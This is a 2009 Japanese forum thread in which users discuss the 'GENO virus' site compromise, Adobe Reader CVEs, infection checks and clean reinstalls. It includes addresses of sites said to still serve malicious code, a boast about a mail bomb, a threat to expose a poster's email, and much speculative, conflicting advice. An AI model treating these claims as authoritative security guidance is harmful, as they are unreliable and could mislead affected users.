なんか足らんとかわかりにくいわボケとかあったらいってね
http://www1.axfc.net/uploader/He/so/214784.zip

長文テキストなんでめんどい人はスルーで

536 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:15:28
IDでないんだった><
>>535>>525れす

537 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:20:56
ちょ、その結論ヤバスw

538 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:25:56
> 各種ウィルス本体をInternetTempが展開される
日本語でOK

> chmファイルの脆弱性を利用しようとしている模様
これ確定してたっけ?

539 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:27:48
まじお役立ちツールサンクス

540 :525:2009/04/09(木) 17:46:48
やっぱりわかりにくいんでサーバとクライアントわけます

>>538
指摘thx
コピペしてちょっと改変とかだからおかしいとこあるかもしんない
chmはどっかにあがってた気がするけど忘れた
確定じゃないかもしれんからやめとくか

541 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:03:36
とりあえず家族のPCのadobeReaderのJS切ってきた
説明するのに苦労したよ・・・・・・・

542 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:07:48
マジびっくりした。起動したまま放置してたらPCがピロリッとか言うんで見てみた。
全てパッチ済みで踏んだXPのSP3なんだけどいつの間にかTR/Agent.caaj [trojan]が、
\System Volume Information\_restoreに潜り込んでた。
ここからexeを呼ぶということは他に仕組みが動いてるはず。やばい。ある日突然活動開始するかも。


543 :525:2009/04/09(木) 18:09:07
サーバとクライアントわけて修正
これで出そうかなと
http://www1.axfc.net/uploader/He/so/214810.zip

544 :525:2009/04/09(木) 18:24:04
語尾とか言葉の修正と参考URL適当に追加して送るわ

545 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:26:19
で、うちバスターなんだけど
各社のウイルス対応状況はどうなの?
カスペ・ノートンはOK?

GENOが情報出さないから(情報出す能力がない?)
どんな事サイトにされたかウイルス仕掛けられたのかが判ってない状況で
各社に対応してもらってないのか

調べてると情報が色々あって判んなくなってきたわ

546 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:29:14
>>545
半年ROMってろ

547 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:32:14
半年後には沈静化してるだろうがな

548 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:33:07
んじゃ、100年ROMってろ

549 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:34:55
前にexplore.exe改竄された時Dr.Webで修復出来たような・・・

550 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:38:34
ROMって判んなくなってきてるから聞いたのに。。。
100年ROMってマス

551 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:39:04
//www.naxos.co.jp/

【お詫び】
2009年4月7日午前より、8日昼頃にかけまして、弊社サイト内で
障害が発生しておりましたが、現在は復旧致しております。
ご迷惑をおかけ致しましたことをお詫び申し上げます。

なお、上記期間中に弊社サイトをご覧になられた場合、
パソコンによっては、ウイルスに感染している可能性がございます。
お心当たりの方は、大変恐れ入りますが、お使いのパソコンの
ウイルスチェックや、ウイルスソフトの最新版へのアップデートなどの
ご作業をお願い申し上げます。
(2009年4月8日 15時30分 ナクソス・ジャパン株式会社)

552 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:47:27
ウィルスソフト最新にしちゃらめえええええええええ

553 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:48:22
            /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ削除すりゃぁいいんだよ!!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /

554 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:51:10
> ウイルスソフトの最新版へのアップデート
ダメだなこりゃ

555 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:52:36
ソフト最新にして再起動であぼんですねわかります

556 : ◆W07s5cWHb. :2009/04/09(木) 18:53:52
あんちとうんちの違いに迷ってそのまま付けずにテキトーに書いた感じだなw

557 :名無しさん@お腹いっぱい。:2009/04/09(木) 18:55:06
まあIIS5.0じゃこんなもんだろうな・・・
とりあえずJPCert/CC送信完了

558 : ◆W07s5cWHb. :2009/04/09(木) 18:59:41
どうみても管理者不在鯖だな。

>>557
もつかれちゃん。

559 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:01:52
攻撃サイトとして報告されています!と火狐に怒られるんだが・・・
ttp://www.umax.net/
「Google が最後にこのサイトを巡回したのは2009-04-06で、
このサイトで不審なコンテンツが最後に検出されたのは2009-04-06です。」
だって。

560 : ◆W07s5cWHb. :2009/04/09(木) 19:05:40
>>559
うちのIEでは全然問題ないな。

てか、UMAXが感染したら格安メモリ厨完全死亡だなw

561 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:08:00
今sqlsodbc.chmのMD5を確認してみたが
F639AFDE02547603A3D3930EE4BF8C12 だった
まあ安全圏だな

562 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:12:45
>>560
迷わず突撃するお前が大好きだ

atom機用に一枚ポチったらこの騒ぎにこのタイミングだw

563 : ◆W07s5cWHb. :2009/04/09(木) 19:15:50
>>562
ちなみにトップページしか見てないんで、そこんとこよろしこ。
UMAXの全てのコンテンツの現段階での安全性を保障している訳じゃないんで。

てか、若しかしてUMAXもGenoウィルス食らってて
書き換えられた部分を修正した後なのかも知れないな。

564 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:16:48
感染したドライブのバックアップから感染ファイルを復元するためにリアルタイム検索を停めて
あれこれやってたらtmproxyがランタイムエラーで落ちたorz。
落ちるなよ…
再起動したらIPフレンドがIEの設定を変えようとしていると不正変更の監視に引っかかるし
またやられたかなぁ。
まだ復元してなかったんだけどなぁ。
今の所前回みたいな症状は何も出てないしcmdもregeditも動いてる。
netstatでもあやしい接続はない。
IPフレンドもハッシュはZIPから解凍したオリジナルと変わらない。
バスターによるウイルス検索もクイック検索では何も出てこない。
とりあえずこのままオンラインチェックをやって問題ないようなら様子見だな…

565 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:17:59
VISTAが守ってくれました
ありがとうVISTA

566 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:42:29
なんか自分語りとか雑談で連投してるやつがキチガイに成りすまされたら〜みたいなこといってるけど
お前だろうが他のキチガイだろうがこっちからしたら同じだってことに気づいてくれないもんかな
やっぱキチガイだから無理か

567 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:46:55




568 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:50:46
清書して送信したバージョンうpっときます
http://www1.axfc.net/uploader/He/so/214849.zip

569 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:55:52
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/

570 :名無しさん@お腹いっぱい。:2009/04/09(木) 19:58:53
なるほど。>>566が ◆W07s5cWHb.の言っていた
ウィルス並みの基地外か。

571 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:02:58
>>568のミスって名前とメアド入ってたんで削除しました
http://www1.axfc.net/uploader/He/so/214862.zip

572 : ◆W07s5cWHb. :2009/04/09(木) 20:04:10
>>571
ドジっ子めっ♪


573 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:04:52



574 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:07:24
結局「GENOウィルス」って名称で確定したのか?
 
GENO涙目だな。

575 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:09:34
>>571
おつ

576 : ◆W07s5cWHb. :2009/04/09(木) 20:13:28
>>574
てか、特定のセキュリティ製品の定義ファイルで使われているからな。既に。

577 :KD125054108237.ppp-bb.dion.ne.jp.2ch.net:2009/04/09(木) 20:16:52
geno geno

578 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:17:19
>>568
>>571
ゲットしたぜw

579 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:21:19
>>577
入れた?

580 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:23:38
>>577
何だお前さんだったのかw


581 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:23:40
まだぶっちゃけ何をするウィルスかは分かってないだろ・・
実は匿名でwindowsの欠陥を直してくれている正義ウィルスだったり

582 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:26:09
>>566
なんか
お前だ
やっぱ

583 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:26:51
いや使用者に無断で何かするのは正義とは言えないだろww

584 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:28:17
>>576
で、お前がトリップがどうのと言い始めたことが火種になって荒れはじめたのは、
どう解決してくれるの?

585 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:28:32
>>568
なれないことはするもんじゃないねw

586 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:31:47
>>577
だれだよw

>>585
ですよねー

本名じゃないから大丈夫だけどいたずらメールしないでね><

587 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:35:12
おれの突撃フォルダにあるメールボムは上限1,000通らしいが

588 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:35:57
何、なんでこんな馴れ合いスレになってるんだ?w

589 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:36:28
>>586
本名じゃないから晒してもいい?
つか、メアドググルといろいろヒットするんだね…

590 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:36:29
GEBO

591 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:37:33
VMじゃうまく感染できないから力になれんのだよ

592 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:38:04
対策のまとめまだ〜

593 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:39:01
>>588
ν速民が流れ込んできた

594 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:41:23
お前ら玄人面しててワロタw

595 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:43:33
>>589
メアドあせって検索したけどでてこなかった
アレありそうな名前だから誰かかぶったらかわいそうなんだが

596 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:45:21
>>595
晒したメアドは破棄するのが常識だぞ

597 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:48:03
>>595
新たなメアドと新たな名前で再送しとけ。

598 :名無しさん@お腹いっぱい。:2009/04/09(木) 20:48:15
http://crestronjapan.com/
ほかまだ直ってないんだけど、これ通報してもいいレベルだろ

599 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:02:19
すいません577です
裏に入れると書いてたのがあってやってみました(^_^;)
間違えたようですm(_ _)m

600 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:04:44
>>599
ドン
裏で待ってるよw

601 : ◆W07s5cWHb. :2009/04/09(木) 21:11:37
ν速のスレ見てる奴は把握してると思うけど、ちと大きめなサイトが来たな。

**** 価格比較のECナビ Part43 ****
http://gimpo.2ch.net/test/read.cgi/point/1238752206/84

84 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/07(火) 12:26:50 ID:AHGC13lc0
今日の■□□□をクリックすると、カス7が木馬だ木馬だと騒ぐんだが
カスだから誤検知かなぁ

602 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:13:45
>601
それmag-puppine.com/about/だろ?

603 : ◆W07s5cWHb. :2009/04/09(木) 21:15:18
>>602
あ、結局お勧めの中の鯖がそうだったんだっけか。
すまんな。

604 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:18:40
>>598
直リンすんなキモブタ

605 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:20:17
>>604
おい名無し
張り切っているのはわかるが図に乗るのはほどほどにしておけ・・・
ここでいきなり引退させてやろうか?

606 : ◆N9P3SuvBPo :2009/04/09(木) 21:20:31
>>598
ほかというか、そのトップすら直ってないんじゃないか?
ソースにもろ問題のコードがあるし。
でも直リンはしないでくださいね。

607 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:22:59
いよいよ始まったか

608 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:24:04
>>598
直リンすんなキモブタ

こうですか?わかりません><

609 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:26:29
まだ対応してないアンチウイルスソフトってあるんですか?

610 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:40:25
>>598
直リンすんなキモブタ

611 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:42:56
>>598
直リンすんなキモブタ

612 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:47:17
>>609
ソフト次第で検知レベルにも色々と差があるから対応/未対応の区別は難しい
でも調べたところウイルスセキュリティZEROが未対応なのはガチ

613 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:55:00
>>612
横から申し訳ないんだけど、本体はまだほとんど検知できないってマジ?

614 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:58:36
くそっ またフリーズした このウィルスめ・・・
買い物は全て激安通販でって思ってたのに情けない・・・
笑っちゃうよねっ 馬鹿みたいだけどさ・・・ 俺は
新品ノートPCが激安で売ってるショップがあるからって見に行っただけなのに・・・
正直・・・ 面食らっちゃって 動揺を隠すよう振舞うので精一杯だった・・・
俺は・・・ 本当は・・・ 悔しいですっ!!

615 :名無しさん@お腹いっぱい。:2009/04/09(木) 21:59:03
先日の土曜日午前にGENOにアクセスして
ブラウザ(ニール)落ち。その後数回試すも同じ
その後、IEで試しても落ち。
Readerは起動せず。

AdobeReaderは9.1
flashは最新じゃなかったかも
OSはXPsp3

で各サイトでかかれいてる検証方法をいろいろ試したのですが
どれもヒットなし。
これって助かってるんですかね?

616 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:05:33
再起動すれば、完全に分かるよ。
お勧めはしませんが。

617 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:07:28
俺は土曜日午後一時頃にGENOにアクセスして
ブラウザ(ニール)全く変化無し IEで試しても変化無し
Readerは起動せず。

AdobeReaderは6.0
flashは不明
OSはMe
jsは常に切ってる

で各サイトでかかれいてる検証方法をいろいろ試したのですが
どれもヒットなし。
アンチウィルス オンラインウィルス アンチスパイウェアどれも検知せず
これって助かってるんですかね?

618 : ◆W07s5cWHb. :2009/04/09(木) 22:09:21
>>615
土曜日午前だと判断に窮するな。
ぶっちゃけ、その頃には既にgeno鯖が改ざんされていたと思われるんで。

とにかく、疑わしい場合は手間を惜しまずに可及的速やかにクリーンインストールかリカバリを行うべき。絶対に。

619 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:10:22
まとめるとこういう事だな
http://kissho.xii.jp/1/src/1jyou71112.html

620 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:12:29
>>618
ジャバスクリプト切ってても感染するの?

621 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:14:51
不安なら>>191にある方法試してみたら?

622 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:15:03
>>618
俺は? ねえ俺は?

623 : ◆W07s5cWHb. :2009/04/09(木) 22:15:27
>>620
切っていれば理論上感染しない。

てか、情報を小出しに質問すんなっての。

624 : ◆W07s5cWHb. :2009/04/09(木) 22:16:51
>>622
めんどいからぼるおっさんにでも聞いて来い。

ぼるじょあ(・3・)質問箱 セキュ板出張所27
http://pc11.2ch.net/test/read.cgi/sec/1233144146/


625 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:18:44
>>623
書いてるだろうが

626 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:18:50
>>624
どうせ暇なんだから答えてやれ

627 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:19:33
(・3・) エェー

レスまとまってる>>336は定期的にageていくべき

628 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:20:11
>>627
名にそのKAO?
馬鹿に支店の?

629 : ◆W07s5cWHb. :2009/04/09(木) 22:24:20
>>626
こー見えても桜花賞の展望を検討とか予想したりして何気に結構忙しかったりするw

630 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:25:11
(・3・) エェー バカになんてしてないYO!

631 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:27:02
>>601のECスレの84なのですが、それを踏んだ時にkasperskey7.01.325を一時切ってました...
踏んだと同時にadobe readerの9.01へのupdateが起動kasperskeyの更新処理が同時に発動し、CPUが100%近くになり固まったため
電源落として強制的に終了
その後再起動しkasperskeyもオンにして再度踏んだら84だったワケですが、後でやった完全スキャンでは何も出ませんでした
>>336を見て

・再起動後regedit.exeは問題無く起動、cmdも同じく起動
・sqlsodbc.chmの値はここの>>84と同じf639afde02547603a3d3930ee4bf8c12(50,727 バイト)
>>191のページは取り消されたアクションになるがダウンロードはできる

なら、取りあえず可能性は低いとみて良いでしょうか

632 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:28:23
>>613
マジ。
つい最近ネタのつもりで買ったんだけど
噂に違わぬ検知力だと実感w


633 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:29:57
自分のブログにここのまとめ書いていいのかな…


634 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:30:14
nod32は?

635 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:30:32
>>631
>>314

636 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:34:11
>>631
限りなく怪しい

637 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:35:00
>>631
adobe readerとflashのバージョンは?

638 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:36:00
>>631
とりあえずキャッシュ消せ
それで解決って感染元が言ったんだから、それで間違えたら責任追及できる

639 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:36:46
>>633
皆が賛成すればOKじゃないだろうか。
2chのスレだと、読みにくいし、
規制されている人もいるから。

640 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:38:22
readerがタイミング良すぎてやっぱり怪しいですか....

>>631
当時は9.0今は最新に、flashは現在最新にしてしまって当時は分かりません


641 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:38:46
>>633
知識がない奴が間違ってGENO踏まないような配慮すりゃいいんじゃない

642 :640:2009/04/09(木) 22:39:23
×>>631
>>637です

643 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:39:48
>>631
>>637次第でかなり絞られる

感染例のあるバージョンだと
どう潜んでるかわからんから安全かどうかなんて誰もわからんよ
セキュ板住民ですらお手上げでJPCERT/CCの回答待ちなんだから…


644 : ◆W07s5cWHb. :2009/04/09(木) 22:39:49
>>631
感染の可能性が高い低いって観点で考えないで、↓の様に考えた方がいいと思う。

・ウィルスを踏んだ恐れがあるPC内に個人情報や消されたり外部に流出しても痛くも痒くもない物しか入っていないのなら、
そのまま使い続けても構わない。

・そのPCで定常的にネットバンキングの残高照会をしたり、競馬のPAT投票をしたり、
アマゾンやその他のネット通販でカード番号を入力したりする事がある場合は、
面倒がらずにとっとと再インストールかリカバリをする。

645 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:40:04
FOXが何らかの対処とればいいんだが宝くじを当てるぐらいの確率でやらないなw

646 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:41:30
>>632
d。前段階で蹴らないソフトだとおしまいってことか。怖っ。


647 :633:2009/04/09(木) 22:43:56
>>639
ニュースにもなってるし被害拡大しない為にも
書いてみるかな…

>>641
それだけだと自分が感染してるか心配な人が検索しまくって
間違ってGENOにいっちゃうとかありえそうでな〜
2chを見るのに抵抗がある人もいるし

つーことで簡単に自分なりにまとめて書いてみます。

648 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:45:58
>>644
botnetに組み込まれて犯罪のお手伝いをする可能性はあるからクリーンインストール推奨

649 : ◆W07s5cWHb. :2009/04/09(木) 22:48:50
>>648
まぁ、結論を言うとその通りなんだけどね。
疑わしきPCは全て再インスコorリカバリ必須って事で。

650 :631:2009/04/09(木) 22:50:24
そうですね今は不確定な情報の状態だから「確実」はないので入れ直した方がいいですね
再インストールを考えた場合、こういった感染というものはC:以外にもするのでしょうか
一つのHDDをCとかDとか分割して使用してる場合や、HDDが複数ある場合も
全て感染を疑うべきものなのでしょうか?
C:だけをリカバリすれば済むものなのでしょうか

651 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:50:28
絶対やだ><

652 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:50:44
>>647
このURLは絶対踏んじゃダメリストを作って、検索エンジン使う際は
上記URLと検索結果のURLを確認すること、悪意を持って転送トラップを
仕掛けてる人が居るから怪しいURLは踏まないこととか
しっかり書いておくしかないんじゃね?

653 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:52:57
2chの人達がひたすらあれから調べているのに
未だに本体が分からないって凄いな
やはり書き換えの実行した後消すような感じかな

654 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:57:00
これまだガキでよくわからんのだけどこういうののプロになりたい
名に目指せばいいの?

655 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:57:51
てっぺん

656 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:01:35
げっげっ げげGENOげー♪

で替え歌作ってくれ。

657 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:02:10
しょうもな

658 : ◆W07s5cWHb. :2009/04/09(木) 23:03:06
>>650
現状ではまだウィルスが具体的にどんなデータを盗み出したりする等の詳細すら判明していない状況なので、
正直誰にも「このPCは安全」と断定する事は出来ない状況です。

とにかく、面倒だというのは承知の上で言ってるんだけど、再インストールやリカバリを行うべきです。

ちなみにリカバリ方法に関しても、まだノウハウが完全に纏まっている状況ですらないです。

確実にウィルスとおさらばしたいのなら必要なファイルだけをピンポイントで抜き取って、
メーラ等のデータもメーラが正常に起動するのであればメーラ内からエクスポートして
エクスポートしたデータのみを別のPCやCD/DVD-R等に焼いてバックアップを取るなんて方法が望ましいかと。

一応、このウィルスの今までに判っている挙動を見る限り
一般的なWindows環境の場合はDドライブ内にウィルスが入り込む事はほぼ無いと思うけど、
正直保障は出来ないレベル。

659 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:04:25
今年の最強ウィルス?

660 : ◆W07s5cWHb. :2009/04/09(木) 23:05:53
>>644をちょこっと訂正


・ウィルスを踏んだ恐れがあるPC内に個人情報を一切記録してなくて
データが消されたり外部に流出しても痛くも痒くもない物しか入ってなく、
その上で外部のクラッカー等からパソコンを踏み台にされてインターネット犯罪等に利用されても一向に構わないというのなら
そのまま使い続けても構わない。

・そのPCで定常的にネットバンキングの残高照会をしたり、競馬のPAT投票をしたり、
アマゾンやその他のネット通販等でカード番号を入力したり、
他人に知られたら恥ずかしくて生きていけなくなる様な自分のブログにログインして記事を書いたりする事がある場合は、
面倒がらずにとっとと再インストールかリカバリをする。


661 :615:2009/04/09(木) 23:06:17
>>618
d
おそらくそのころGENOサイトは改竄されていたんでしょうけど・・・
トップにアクセスしたらしばらく表示したあと、メモリ使用量があがり、ブラウザが落ちる
って状態でした。

インスコがよさげですね。

662 : ◆W07s5cWHb. :2009/04/09(木) 23:07:50
>>659
食らうとマイドキュメント等のユーザーデータを一切合財消去するウィルスがあったから
あれが一番最凶だと思う。

てか、この前食らって再インストールしたわw

663 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:09:18
>>662
ざまあ

664 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:09:57
pdfのJavaScriptを読むと

Adobe Reader 8系8.1.2未満、7系7.1.0未満、6以下全て
  →CVE-2007-5659

それ以外
  →CVE-2008-2992

みたいな感じで脆弱性をついているように見える。
CVE-2008-2992は8系8.1.2以下に存在する脆弱性なので、まとめると

Adobe Reader 9.0/8.1.3/7.1.0以上

であればpdfによる感染は免れるように思うんだけど、
上に挙げたバージョンのAdobe Reader使ってて感染した例はあったっけ。

665 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:10:41
マイドキュメントの中身300GB全部削除されたら自殺するな。オレ。

666 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:15:13
>>644

>>615によれば、Adobe Reader9.1で感染したような事を>>661で言ってるような・・

未対処・未知の脆弱性かも

667 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:15:31
>>664
8.1.3だったけど、readerの使用メモリが異常に増えたよ。
それ移行の挙動はreaderがアップデートしろって言うだけで
他に挙動不審な点はなかった。u.bat作成なし、sqlsodbc.chm改変なし
一応a-squadでいくつかウイルスは見つかったけど、
今回のものかどうかわかんないや。>>156に人も同じ感じだな

668 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:16:53

とりあえず、おいらは火狐のアドオンでAdobeReaderを無効化しておいた。

669 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:17:39
>>662
kwsk
検体ある?

670 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:17:44
>>658
有り難うございましす、動画が1テラ以上あるので(noエロw)そういうのはどうなのかと思いまして
何とかやってみます

>>660
個人情報ありまくりですwC:にはありませんがrobotのpassたちが

皆様有り難うございました


671 :666:2009/04/09(木) 23:17:52
訂正

 
× >>644

〇 >>644



672 :666:2009/04/09(木) 23:19:07
aaaa再訂正...orz

 
× >>644

〇 >>664


673 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:19:18
勝手に無理なOCさせてBIOSぶっこわすウイルスなかったっけ

674 : ◆W07s5cWHb. :2009/04/09(木) 23:20:40
>>664
そこまで完全に把握出来てないんだけど、
確かν速のスレで9でも食らったと言ってた人がいた記憶がある。確約出来ないけど。
恐らく9.0を指していたと思うけど。

ちなみにν速の過去スレにて挙動実験をおこなってた人がいて、
その結果では8.X系に関しては
8.1.1以下でしかウィルスが動作せずに
8.1.2以上ではウィルスが動作しなかった様な事を報告していた人がいたと思う。
その点ではCVE-2008-2992の脆弱性と一致するね。

尚、その人からの7.X系や9.Xに関しての報告はあの時点では無かった筈。
もしかして貴方があの報告をしてくれた人なのかも知れないけどw

675 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:20:39
俺も踏んだとき、ページファイル食わされただけだった
その後、確認されている感染現象は大抵チェックしたし、普段使っていておかしなところもない

ページファイルはウィルスというよりJavaScriptの問題なのかな?
ブラウザに異常があっても、感染していないケースがあってもいいと思いたい

最近クリーンインストールしていたので、リーダー、FlashPlayer、WindowsUpdateは多分最新

676 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:21:09
>>659
ここ数年でも最凶レベルだと思う
このクラスのゼロデイアタックは滅多にないんじゃない?
ある程度のセキュリティ対策してる人でも余裕で感染するし
adobeのソフトウェアは入れてる人が多い割にはアップデートあんまりしない人が多いしな

677 : ◆W07s5cWHb. :2009/04/09(木) 23:22:12
>>666
その可能性もゼロではないけど、正直なんともいえないな。
ちなみにうちはProExtend9.1でなんども踏みまくってるけど、全然無問題。

678 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:22:58
ゼロデイじゃないけどな。
しかしPDFが貼られていないページ参照でもPDFの脆弱性を突かれるとは盲点だった・・

679 :615:2009/04/09(木) 23:24:31
>>666
感染したかどうかはわかりません。
ただ、今まででいてる検証ではなにも問題がでていません。

でもだからといっても安心もできないわけで・・・

680 : ◆W07s5cWHb. :2009/04/09(木) 23:25:15
>>669
ノートン先生もスルーして検体すら採取出来ずに終わった。
最終的にハングって再起動→ブルースクリーンのコンボを食らった。

ぶっちゃけ、セキュ板かソフトウェア板あたりのスレに張られていたリンクを踏んで食らったんですよ。

681 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:26:36
この件があってから Reader8から
Reader9.1にした

682 :676:2009/04/09(木) 23:27:56
>>678
そうか。なんか噂じゃ現地時間の四月二日のカナダ産って聞いたから
んでGENOが攻撃受けたのが日本の四月四日の朝だっけ
ただその前にも外国ではあったみたいだしよくわからん(三月末辺り?)

683 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:29:18
Adobe readerは9.1にアップデートしようとするとインストールモジュールが
70MB超なのがダルい。
この容量のせいでアップデート面倒くさがる人が多いんだろうなと思う(俺含め)
たかがReaderの分際で・・・

684 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:32:06
>>682
脆弱性の指摘は2008/08〜
u.batの存在は2009/01〜
感染報告は2009/03/28〜

685 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:32:46
そもそもpdfが重いから嫌い、って人多いしね
見れなきゃ困るから一応入れとくけど更新はしないor更新に気がつかない、ってのが大半な気がする

686 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:34:30
今年に入って必死にスパム送りまくってロガーからftp手動で頑張って流行らそうとしてるktがいるんだろ

687 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:34:51
>>682
恐らく、同じ脆弱性を突く別のものなんじゃないかね。
で、これは使えるwwwwって、ラトビアの人が改造してばら撒いたと。

まぁ、こんな感じだから、なんとかクリーンインストールを避けたくて
ここ見に来る人も、面倒臭がらずに入れ直した方が良いよ。
あれこれやって時間だけ食って、結局入れなおす羽目になるから。

しかし、Adobe ReaderとFlash Playerの脆弱性か。これは確かに
盲点だなぁ。WinUpdateと比べて自己主張しないし、実害ないだろって
自動アップデートも告知もOFFにしてる人多そうだ。

688 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:38:05
4月から会社のIT委員(IT部門のような専門家じゃない)になったら
いきなりウイルス騒動でてんてこまい。
GENOの話も今日知ったので、アドビのうpdateするようにいわなきゃ。

689 :664:2009/04/09(木) 23:38:18
>>666
>>667
>>674
flashの方の脆弱性をつかれてる可能性もあるから切り分けが難しいな…
ちなみにLinux上のFirefoxでも踏んだら落ちる。
メモリをバカ食いするのは、メモリを食いまくるようなコードになっているため。
sqlsodbc.chmの改変がないところを見ると>>664で正しいような気もするが…
もし他の感染例があったら報告頼む

690 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:39:37
>>687
いい勉強になったよ、確かに意識が低すぎたと反省しきり
脆弱性に関するニュースはちゃんとチェックしなきゃと痛感

691 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:40:39
携帯電話向けワームが出現,エフセキュアがマルウエア動向を発表
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090409/328160/

692 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:44:42
